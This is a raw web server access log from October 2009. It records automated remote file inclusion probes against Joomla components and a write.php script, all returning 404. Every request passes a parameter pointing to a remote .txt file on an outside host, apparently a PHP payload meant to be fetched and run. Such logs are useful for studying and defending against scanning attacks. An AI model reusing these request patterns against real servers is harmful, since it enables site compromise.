69.72.215.82 - - [28/Oct/2009:00:49:44 -0400] "GET /logs/error_log.Q109062200/index.php?arquivo=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
62.140.23.192 - - [28/Oct/2009:00:49:46 -0400] "GET /logs/access_log.Q109081000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:49:58 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:49:58 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:49:58 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:49:59 -0400] "GET /logs/access_log.Q109081000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:49:59 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:50:00 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:50:00 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
58.230.118.81 - - [28/Oct/2009:00:50:01 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.fileden.com/files/2009/10/22/2615994/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
